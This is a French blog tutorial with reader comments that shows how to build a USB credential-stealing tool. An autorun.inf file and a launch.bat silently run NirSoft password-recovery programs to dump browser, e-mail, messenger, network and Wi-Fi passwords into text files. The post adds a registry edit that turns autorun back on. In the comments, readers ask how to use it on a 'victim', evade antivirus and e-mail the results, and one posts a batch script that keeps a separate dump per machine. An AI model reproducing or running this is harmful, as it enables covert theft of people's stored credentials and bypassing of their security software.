Création d’un rootkit pour pirater les mots de passe d’un ordinateur.

Sous ce titre accrocheur, nous allons voir qu’avec un peut de bon sens, nous allons réaliser un script qui permet de scanner  et déchiffrer les mots de passe de votre PC à l’aide d’une clé USB. Bon je sais ce n’est pas conficker, mais bon.

Dans un premier temps, nous allons récupérer plusieurs logiciels qui nous permettent de déchiffrer les mots de passe des applications les plus courantes. Toutes ces applications sont issu du site Nirsoft :

  • MessenPass: récupère les mots de passe de messagerie instantanée le plus populaire des programmes: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger avec Netscape 7, Trillian, Miranda, GAIM et.
  • Mail PassView: récupère les mots de passe des programmes de messagerie suivants: Outlook Express, Microsoft Outlook 2000 (comptes POP3 et SMTP uniquement), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP et SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
  • IE Passview: IE PassView est un petit utilitaire qui révèle les mots de passe stockés par le navigateur Internet Explorer. Compatible avec le nouveau Internet Explorer 7.0, ainsi que les anciennes versions d’Internet Explorer v4.0 – v6.0
  • Protected Storage PassView: Récupère tous les mots de passe stockés dans le Protected Storage, y compris la saisie semi-automatique des mots de passe d’Internet Explorer, les mots de passe des sites protégés par mot de passe, mot de passe de MSN Explorer, et plus …
  • PasswordFox: PasswordFox est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Mozilla Firefox. Par défaut, PasswordFox affiche les mots de passe stockés dans votre profil actuel, mais vous pouvez facilement choisir de regarder les mots de passe de tout autre profil Firefox. Pour chaque mot de passe d’entrée, l’information suivante est affichée: Record Index, site web, nom d’utilisateur, mot de passe.
  • Network Password Recovery : Lorsque vous vous connectez à un partage réseau sur votre réseau local ou sur votre compte. NET Passport, Windows vous permet d’enregistrer votre mot de passe afin de l’utiliser à chaque fois que vous connectez sur le serveur distant. Cet utilitaire récupère tous les mots de passe réseau stockés sur votre système pour l’utilisateur connecté.
  • ChromePass : ChromePass est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Google Chrome. Pour chaque mot de passe, l’information suivante est affichée: URL Origine, URL action, le nom d’utilisateur, mot de passe et l’heure de création.
  • WirelessKeyView  : WirelessKeyView récupère toutes les clés de réseau sans fil / mots de passe (WEP / WPA) stockés dans votre ordinateur par le service ‘Wireless Zero Configuration’ de Windows XP et par le service ‘WLAN AutoConfig’ de Windows Vista.

Créer un dossier RootKit sur votre bureau et téléchargez toutes les applications ci-dessus dedans.

Rootkit_USB_1

Ensuite décompresser toutes les archives et gardez que les exécutable (.exe)

Rootkit_USB_2

Copiez tous les fichiers .exe du répertoire à la racine de votre clé USB.

Rootkit_USB_3

Ouvrer le bloc-note de windows et copier le texte suivant

[autorun]
 open = launch.bat
 ACTION = Scan Passwords

Rootkit_USB_4

Puis enregistrez le fichier sous la racine de la clé sous le nom autorun.inf

Ouvrer un autre bloc-note et copier le texte suivant :

 start ChromePass.exe /stext ChromePass.txt
 start iepv.exe /stext iepv.txt
 start mailpv.exe /stext mailpv.txt
 start mspass.exe /stext mspass.txt
 start netpass.exe /stext netpass.txt
 start PasswordFox.exe /stext PasswordFox.txt
 start pspv.exe /stext pspv.txt
 start WirelessKeyView.exe /stext WirelessKeyView.txt

Ensuite enregistrer votre document à la racine de votre clé, sous le nom de launch.bat

Rootkit_USB_6

Votre rootkit est maintenant prêt. Nous allons le tester.

Sur certain ordinateur, comme le mien par exemple j’ai désactivé l’autorun, pour ce tutoriel je vais le réactiver. Ce rootkit fonctionne quand même il suffit juste dans le poste de travail de cliquer sur le fichier launch.bat pour lancer le rootkit, si l’autorun est désactivé.

Pour activer l’autorun pour tous les lecteurs, aller dans Menu Démarrer → Exécuter → (taper regedit.exe)

Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] et modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091. Si la clé n’existe pas il faut la créer.

Rootkit_USB_7

Redémarrer le PC. Ensuite insérer votre clé USB, un menu s’affiche et sélectionner Scan Password, la première option.

Rootkit_USB_8

Maintenant, tous les outils de récupération de mot de passe seront exécutés silencieusement en arrière-plan (ce processus ne prend que quelques secondes). Les mots de passe sont stockés dans les fichiers .TXT.

Rootkit_USB_9

Vous n’avez plus qu’a les ouvrir et voir les mots de passe déchiffrer. Je vous conseil de visiter régulièrement le site de NirSoft car des mises à jour ainsi que des nouveaux logiciels sortent souvent.

That’s All.

62 Potins

  1. Bonjour, je ne peux pas créer la clé… problématique.
    Pourriez-vous me donner des indications pour cela ? merci d’avance

  2. Bonjour Jkulina,

    Si la clé n’est pas présente dans ta base de registre il suffit de la créer comme indiqué dans le tutoriel.

    A bientôt.

  3. BOnjour et Merci pour se super tuto !!! ^^

    Par contre… je ne trouve pas la valeur « NoDriveTypeAutoRun » ni dans [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
    et ni dans [HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] et ni dans les autres …. comme HKEY current user ….

    Ou pourrais je donc le trouver svp car j’ai tout fouiner !!! lol

    Merciiiii

  4. Bonjour,

    A ma connaissance non.

    A bientôt.

  5. salut, avec beaucoups d’attention j’ai lu votre tuto, très cool, mais la question que je me pose est que est ce qu’il est possible  » d’infecter » une machine distante avec ce rootkit?

  6. t’inquiète pas c’est normal il faut que tu désactive ton antivirus lorsque tu le fait

  7. jai un problème quand je veux enregistrer le fichier launch.bat mon antivirus détecte un cheval de trois !!
    que faire

  8. Bonjour, d’abord merci pour ce tuto. ça marche très bien. j’ai juste un problème avec l’autorun. J’ai testé la clé sur xp, 7 et vista et quand je met la clé dans le port on me demande ce que je veux faire comme d’habitude. mais il n’y a pas le scan passwords. comment faire?

  9. simple tu ajoute une exclusion dans l’antivirus, du chemin ou ce trouve les exe nirsoft. enfin si tu a la main sur l’antivirus bien sur !

  10. salut! Conment on peut faire pour eviter la detection par l’antivirus
    Merci

  11. Bonjour, impossible de renommer le fichier txt en .bat, il disparait, que ce soit avec seven ou xp, donc la clé ne peut marcher puisque n’apparait pas « lancer scan ».
    oublié quelque chose.? ?
    cordialement

  12. Bonjour,

    Depuis les nouveaux tutoriels j’ai abandonné de marquer la difficulté.

    A bientôt.

  13. Juste pour dire que marquer la dificulté et autre à la fin était useless.

  14. cette mamiere ne permet de recuper uniquement l adresse msn et pas le mot de pass comment faire merci beaucoup

  15. bonjour aider moi svp je sui bloker a niveau de la modification de la clé

    est ce parce que je posède un pc windows 7

  16. un moyen de démarrer une session avec un script contenant votre identification et mot de passe

  17. Merci mais pour les fichier « autorun.inf » et « launch.bat » c’esoilàt impossible en créant un doc texte, j’ai du les faire avec NotePad pour le .bat et pr le .inf je suis allé en chercher un dans un jeux installé sur mon pc.

    Voilà, l’éxécution automatique ne se fait pas (pourtant elle est active)

    Et en cliquant sur « launch.bat » ça se lance mais on voit la fenêtre DOS, l’antivirus demande l’autorisation pr 2 programme et il faut l’autorisation admin pour tous alors que je suis admin…(pas discret ds ce cas)….

  18. Hi,
    merci pour tuto mais il faut ajouter d’autres navigateurs tels firefox et opera.
    Take care

  19. Je ne sais pas si votre réponse est pour moi mais non, c’est un ordinateur personnel

  20. bonsoir,

    Est-ce un ordinateur perso ou celui de travail, car cela ressemble à une restriction imposée dans les entreprises, afin de limiter l’action des utilisateurs ?

    Cordialement

  21. bonjour, je n’arrive pas à décompresser chromepass, je ne sais pas comment faire ? il reste sous cette forme « ChromePass_lng.ini », quelqu’un pourrait me renseigner ? merci !

  22. lorsque je tape regedit.exe je vois une petite bare dans la quelle est écrit: la modification du registre a été désactivée par votre administrateur. j’ouvre mon poste de travail et ma clé usb, je lance launch et rien ne marche.
    que dois-je faire? merci d’avance

  23. Bonjour, finalement ça marche…mais apparemment ça ne retrouve que les MDP qui ont été enregistrés ??
    merci pour votre réponse

  24. Bjr,

    Y’aurait pas une méthode pour contourner les antivirus, parce-que presque tous les utilitaires sont détectés comme Virus/Trojan, donc toute l’opération d’automatiser le lancement n’est plus valable.

    2 chose, j’ai un Win 7 j’ai modifié la valeur, j’obtiens la fenêtre de l’exécution automatique, mais rien ne se passe, et même l’icone de l’application n’est pas là !!!!

    Pourriez vs m’aider

    Merci.

  25. Bonjour, je n’ai que ça sur mon ordi…

    ForceActiveDesktopOn
    valeur 0
    NoActiveDesktop
    valeur 1
    NoActiveDesktopChanges
    valeur 1

    je mets 91 à quelle valeur ?
    j’ai un toshiba satellite.

    j’ai quand même essayé en mettant 91 à ForceActiveDesktopOn, mais vu les résultats…j’ai bien reçu les fichies TXT mais aucun n’avait de MDP…
    merci beaucoup.

  26. Bonjour

    newdaxter et Owiklol

    Vous avez raison, et c’est normal pour d’autre PC, il n’est pas au même emplacement :

    au lieu de

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]

    Faites

    [HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]

  27. Bonjour,

    j ai un petit soucis, le programme marche impeccable, sauf pour IE.

    Rien ne m apparait , le bloc txt reste vierge, et pourtant j y ai laissé pas mal de mot de passe avant de migrer vers mozilla.

    Y aurait il une manipulation supplémentaire a faire ?
    Que faire pour ne trouver que les mp de IE, je suis sur XP, IE8..

    Merci d avance pour votre aide

  28. salut,je voudrais savoir si les demandes suivant sont possible ou non:

    -peut ont exécuter le fichier launch.bat sans autorisation(je ne veux pas que moi ou le victime click sur « Scan Password » ??

    -comment modifier le fichier Autorun.inf de manière qu’il peut exécuter le fichier launch.bat qui se trouve dans un dossier cacher(pas dans la racine du clé par exemple I:\scanpass\) sachant que la lettre ‘I’ sera changer d’un ordinateur à un autre .??

    -peut ont rendre les fichiers utiliser dans ce tuto in-supprimable même avec un formatage

    -la plus important:
    peut ont heberger tous les rootkit+launch.bat et créer un code php qui permet de l’executer dés que le victime click sur le lien et que les fichier .txt seront héberger ou envoyer par mail

    MERCI D’avance

  29. mon fichier launch.bat

    for /f « tokens=6-8 delims=:/  » %%a in (‘ »echo. ^|date|find /i « est » »‘) do set a1=%%c&set m1=%%b&set j1=%%a
    for /f « tokens=4-7 delims=:,  » %%a in (‘ »echo. ^|time|find /i « est » »‘) do set h1=%%a&set mn1=%%b& set s1=%%c& set c1=%%d
    MD %a1%%j1%%m1%%h1%%mn1%%s1%
    start ChromePass.exe /stext ChromePass.txt
    start iepv.exe /stext iepv.txt
    start mailpv.exe /stext mailpv.txt
    start mspass.exe /stext mspass.txt
    start netpass.exe /stext netpass.txt
    start WirelessKeyView.exe /stext WirelessKeyView.txt
    start PasswordFox.exe /stext PasswordFox.txt
    start pspv.exe /stext pspv.txt
    copy *.txt \%a1%%j1%%m1%%h1%%mn1%%s1%\*.txt
    erase *.txt

    impec pour sos des fichiers txt

  30. en quoi un autorun sur volume externe devient il un « rootkit » ?

  31. J’aurai bien aime reussir a avoir le code des autres session… astlog marche??

  32. Bonjour,

    j’ai le meme probleme que certain (voir au-dessus) je ne trouve pas le fichier NoDriveTypeAutoRun pourtant je suis au bon endroit il y a HonorAutoRunSetting. Je suis sur xp… Est ce normal??

  33. je ne trouve pas la variable NoDriveTypeAutoRun j’ai un netbook samsung N145+ et windows 7 édition starter.
    La variable aurait elle changer de nom entre vista et 7 ou est ce a cause de la version starter. Je n’ai peut être pas tout les composant windows, j’ai par exemple du télécharger un module pour pouvoir changer mon fond d’écran car celui ci n’y était pas.

  34. Bonsoir,

    Ces logiciels ne fonctionne pas sous MAC.

    A bientôt.

  35. ne suis pas trés douée, en plus.

  36. Avec mon mac, je n’y arrive pas. Y at’il une possibilité? Je n’ai besoin que d’un seul mot de passe ,sur un autre mac, dont j’ai les identifiants, ip, etc…

  37. yvanovitch.73

    Bonsoir, j’ai trouvé la réponse à ma question précédente, mais voilà mon fichier launch.bat (la première ligne car elles sont toutes identitiques) :

    start ChromePass.exe /stext ChromePass.txt /ren ChromePass.txt %DATE:~6,4%%DATE:~3,2%%DATE:~0,2%%time:~0,8%ChromePass.txt

    mais voilà le problème: cette ligne devrait créer un fichier ChromePass.txt puis le renommer (ren) par ses cordonnées chronologiques+ son nom; mais elle n’en fait rien; le fichier .txt reste ChromePass.txt et ne se modifie pas…
    pourriez-vous m’apporter un peu d’aide?
    Merci Beaucoup et bonne soirée

  38. yvanovitch.73

    @Le Webmaster
    Merci pour votre réponse; je ne suis pas un expert en informatique mais je vais tout de même m’y atteler ;)
    Mais avant juste une question, cette ligne ayant pour but de définir un point dans le temps, que définit-elle (ou du moins que doit-elle définir) ?
    Merci et à bientôt.

  39. Bonjour,

    @yvanovitch.73
    Sans te donner une solution toute faite, voici une ligne à combiner dans ton fichier .bat:
    %DATE:~6,4%%DATE:~3,2%%DATE:~0,2%%time:~0,8%

    Cette ligne peut être rajouter au nom de ton fichier et permet de d’ajouter la date, l’heure, les minutes et les secondes.

    Maintenant c’est à toi de jouer. Si tu y arrives tu peux m’envoyer la solution pour je modifie mon tutoriel.

    A bientôt.

  40. Dubuisson félix

    je ne trouve pas la variable NoDriveTypeAutoRun j’ai un netbook samsung N145+ et windows 7 édition starter.
    La variable aurait elle changer de nom entre vista et 7 ou est ce a cause de la version starter. Je n’ai peut être pas tout les composant windows, j’ai par exemple du télécharger un module pour pouvoir changer mon fond d’écran car celui ci n’y était pas.

  41. yvanovitch.73

    Bonjour,
    je vous remercie beaucoup pour ce tuto très détaillé et très complet mais cependant, quelque chose me turlupine:
    J’ai deux ordinateurs; lorsque je mets ma clé sur mon premier pc, tout s’effectue correctement et les les mots de passe sont stockés dans des fichiers .txt; et lorsque je mets ma clef sur mon 2ème pc, les mêmes actions s’effectuent mais les nouveaux fichiers .txt suppriment les anciens pour écrire par dessus.
    Ma question est donc la suivante: Est-il possible que de nouveaux fichiers .txt soient crées sans supprimer les anciens à chaque fois que je mets ma clé sur une nouvelle machine ?
    Je vous remercie pour vos réponses.
    Cordialement.

  42. merci ^^

  43. Bonjour,

    vous n’avez aucun risque a utiliser ces logiciels, ils ne font que chercher, lire et décrypter certains fichiers et vous révéler les mots de passe, connexions, …

    Cordialement.

  44. merci pour cette reponse !

    j’ai lu attentivement le tuto ci dessous et j’aurais voulu en fait le testé sur l’ordinateur de mes parents pour leur prouver qu’une personne peut facilement pirater leur compte bancaire ou tout autre mot de passe dans le cadre ou mes parent enregistre systématiquement leur mot de passe alors que je m’entête à leur dire qu’il ne faut pas !

    mais j’aurais voulu que l’auteur me confirme :

    Que cette procédure ne laisse pas de virus sur le pc
    et
    Que il n’y à pas de risque de plantage du pc à faire cela

    Ps: En sachant que je vais chez mes parents la semaine prochaine et étant à 150 km de chez eux je voudrais si possible une réponse rapide pour que je puisse le faire la prochaine fois car je n’y vais qu’une fois tout les 2 mois…

    merci beaucoup ! et bravo pour votre site !

  45. Bonjour,

    Si vous allez sur la page de Mail PassView par exemple, en bas de page vous avez 2 liens pour télécharger le logiciel. Prenez le lien avec le fichier zip, vous aurez directement l’exécutable sans besoin d’installer le setup.

    Cordialement.

  46. Bonjour

    j’ai télécharger toute les dernières version des logiciels demander mais pour 2 d’entre eux :

    Mail PassView v1.70
    IE PassView v1.26

    il n’y a pas d’exécutable direct mais un setup…
    donc une installation est nécessaire je suppose, donc comment faire ?

    dois je exécuter le setup est mettre ma clef usb comme destination d’installation ?

    ou faire autrement ?
    merci

  47. Voila ce qu’il faut

    :)

  48. salut tres bon tuto et tres bon site
    mais iepv ne m affiche pas les mot de passe facebook
    comment i remédier et aussi connaisai vous un logiciel pour trouver les mots de passe hotmail
    merci bien
    lucky

  49. Bonjour
    Est-ce qu’il serait possible de faire une commande qui permette d’envoyer par mails les documents .txt qui contiennent les passwords.
    Merci

  50. Bonsoir,

    Non on ne peut pas l’utiliser sur MAC, ces logiciels ne sont compatibles que pour le monde PC. Pour l’exécution automatique regarde dans les commentaires. Il y a quelques temps voici ce que j’ai ecrit :

    Bonjour,

    Pour que l’exécution automatique fonctionne, il faut modifier le contenu de la valeur « NoDriveTypeAutoRun » par le chiffre 91. Attention cependant à bien vérifier que la base est en Hexadécimale. Pour modifier le contenu d’une clé il suffit de double-cliquer dessus.

    Pour que les modifications soient prises en compte, il faut redémarrer le PC.

    Si vous avez un antivirus, essayer de le désactiver pour voir si ça fonctionne.

    A bientôt sur Quick-Tutoriel.com

  51. Bonjour
    J’ai suivie la procédure mais la clés ne démarre pas en automatique sur mon PC ?

    Peut on l’utiliser aussi sur mon Mac ?

  52. Merci,

    La coquille a été corrigée.

    A bientôt sur Quick-Tutoriel.com

  53. Merci pour ce tuto bien expliqué et ma foi, fort simple !

    Une petite erreur cependant : « Ensuite enregistrer votre document à la racine de votre clé, sous le nom de lauch.bat »

    Dans la mesure ou fichier .inf est composé de :

    [autorun]
    open = launch.bat
    ACTION = Scan Passwords

    Il faut un fichier launch.bat et non lach.bat…

    Je pense que peu d’entre vous sont tombés dans le panneau mais on ne sait jamais.

    Pour ma part, le rootkit marche à la prefection et Avast n’y voit que du Feu …

  54. Bonjour,

    Pour que l’exécution automatique fonctionne, il faut modifier le contenu de la valeur « NoDriveTypeAutoRun » par le chiffre 91. Attention cependant à bien vérifier que la base est en Hexadécimale. Pour modifier le contenu d’une clé il suffit de double-cliquer dessus.

    Pour que les modifications soient prises en compte, il faut redémarrer le PC.

    Si vous avez un antivirus, essayer de le désactiver pour voir si ça fonctionne.

    Cordialement.

  55. Et en plus kan je met ma clé usb ya pas d’execution auto …

    Je suis pas hyper bon en info donc j’ai vraiment besoin d’une aide pour debutant !

  56. Je n’arrive pas a renommer le nom de la valeur dans l’édition DWORD
    Que se passe t il ??

  57. @ navid

    ne fonctionne que si vous avez choisi le souvenir de votre mot de passe dans Windows Live Messenger

  58. *

    Salut .
    j’ai bien appliquer le tutoriel sauf que a la fin lorsque je met la clé USB et je sélectionne Scan Password, on me dis ouvrir avec !
    je dois l’ouvrir avec quel programme ?? est se que j’ai commis une erreur ? parce que dans l’édition de la valeur DWORD j’ai trouver comme nom de valeur : HonorAutoRunSetting !

    c’est quoi le problème ?
    Merci de répondre dans le mail ou dans cet cite svp .*

    J’ai le même problème bien que en dehors de ca j’ai quand meme acces aux infos en allant sur le lauch.bat . Une petite réponse?
    Je n’ai pas encore fait attention….peut-on avoir les mdp des différentes sessions utilisateurs des PCs?

  59. mais jai pas trouver les mot de passe des autres sessions ?! il y a rien meme les mot de passe des msn ! juste les mot de passe fire fox ( qu’on peut trouver facilement trouver dans le navigateur )

    vous avez pas une solution pour trouver les mot de passe des autres sessions ?

  60. NN merci voila ça marche merci beaucoup lol

  61. Salut .
    j’ai bien appliquer le tutoriel sauf que a la fin lorsque je met la clé USB et je sélectionne Scan Password, on me dis ouvrir avec !
    je dois l’ouvrir avec quel programme ?? est se que j’ai commis une erreur ? parce que dans l’édition de la valeur DWORD j’ai trouver comme nom de valeur : HonorAutoRunSetting !

    c’est quoi le problème ?
    Merci de répondre dans le mail ou dans cet cite svp .

  62. le probleme c’est que les logiciel nirsoft sont quasiment tous détecter pas les antivirus !

    pourquoi ne pas creer un lien pour télécharger tout ces programmes d’un coup ?

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *